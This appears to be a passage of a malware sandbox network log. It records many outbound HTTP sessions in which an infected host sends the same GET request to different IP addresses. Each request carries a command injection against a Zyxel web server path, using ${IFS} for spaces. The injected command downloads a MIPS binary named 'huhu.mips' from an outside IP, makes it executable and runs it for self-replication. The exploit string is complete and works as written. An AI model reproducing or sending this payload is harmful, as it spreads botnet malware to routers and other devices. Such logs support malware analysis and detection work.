                                                Jan 29, 2024 07:07:39.128253937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2076192.168.2.234151254.131.22.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128300905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2077192.168.2.2360746149.194.42.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128366947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2078192.168.2.2335234208.133.161.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128396034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2079192.168.2.234814090.185.187.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128438950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2080192.168.2.23469981.186.124.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128474951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2081192.168.2.2338596109.178.164.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128520966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2082192.168.2.2357512191.170.66.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128576040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2083192.168.2.234488273.16.218.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128596067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2084192.168.2.2340950121.110.13.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128638029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2085192.168.2.2346126223.160.209.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128675938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2086192.168.2.236080017.85.114.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128710032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2087192.168.2.2355164176.25.181.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128732920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2088192.168.2.2356322142.112.142.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128783941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2089192.168.2.2353056153.97.47.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128837109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2090192.168.2.234494044.54.25.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128876925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2091192.168.2.2334966149.24.161.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128915071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2092192.168.2.234154486.45.55.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128943920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2093192.168.2.2351326103.110.252.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128998995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2094192.168.2.235551892.129.58.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129086971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2095192.168.2.2360850168.228.224.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129101038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2096192.168.2.2347202148.157.236.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129128933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2097192.168.2.2352778152.106.49.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129172087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2098192.168.2.2344472169.5.165.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129214048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2099192.168.2.2356210212.44.105.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129240990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2100192.168.2.233884820.42.183.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129280090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2101192.168.2.2334362218.99.213.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129323959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2102192.168.2.2358352160.24.207.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129358053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2103192.168.2.2343458176.147.195.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129391909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2104192.168.2.233594460.36.137.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129424095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2105192.168.2.2350826138.73.103.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129463911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2106192.168.2.235097278.98.168.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129518032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2107192.168.2.2340144208.32.42.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129555941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2108192.168.2.235524614.116.98.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129596949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2109192.168.2.234569465.62.215.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129627943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2110192.168.2.233362087.50.3.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129678011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2111192.168.2.2349386145.77.163.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129700899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2112192.168.2.235109441.3.255.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129740953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2113192.168.2.234816637.187.227.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129787922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2114192.168.2.2351402114.203.137.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129826069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2115192.168.2.2343826186.178.221.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129863977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2116192.168.2.234534214.119.246.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129925013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2117192.168.2.2350844175.129.229.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.129975080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2118192.168.2.235944283.61.127.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130022049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2119192.168.2.234461691.11.139.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130050898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2120192.168.2.2354046160.177.78.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130090952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2121192.168.2.2341390115.192.112.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130140066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2122192.168.2.234446440.187.24.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130160093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2123192.168.2.2352404180.40.56.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130204916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2124192.168.2.235299076.122.26.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130239964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2125192.168.2.235041836.188.169.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130251884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2126192.168.2.2339466176.197.175.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130270004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2127192.168.2.2345398187.100.122.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130331039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2128192.168.2.234900819.221.38.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130394936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2129192.168.2.234346263.109.89.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130470991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2130192.168.2.2340472144.127.75.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130497932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2131192.168.2.2357096185.175.43.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130537987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2132192.168.2.2334062105.126.157.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130584002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2133192.168.2.2339540137.118.31.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130633116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2134192.168.2.2353516175.178.76.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130692959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2135192.168.2.233674892.122.170.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130713940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2136192.168.2.2354624213.237.60.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130743027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2137192.168.2.234695242.131.214.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130800962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2138192.168.2.2360406141.79.138.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130817890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2139192.168.2.2348856209.161.20.123443
                                                TimestampBytes transferredDirectionData
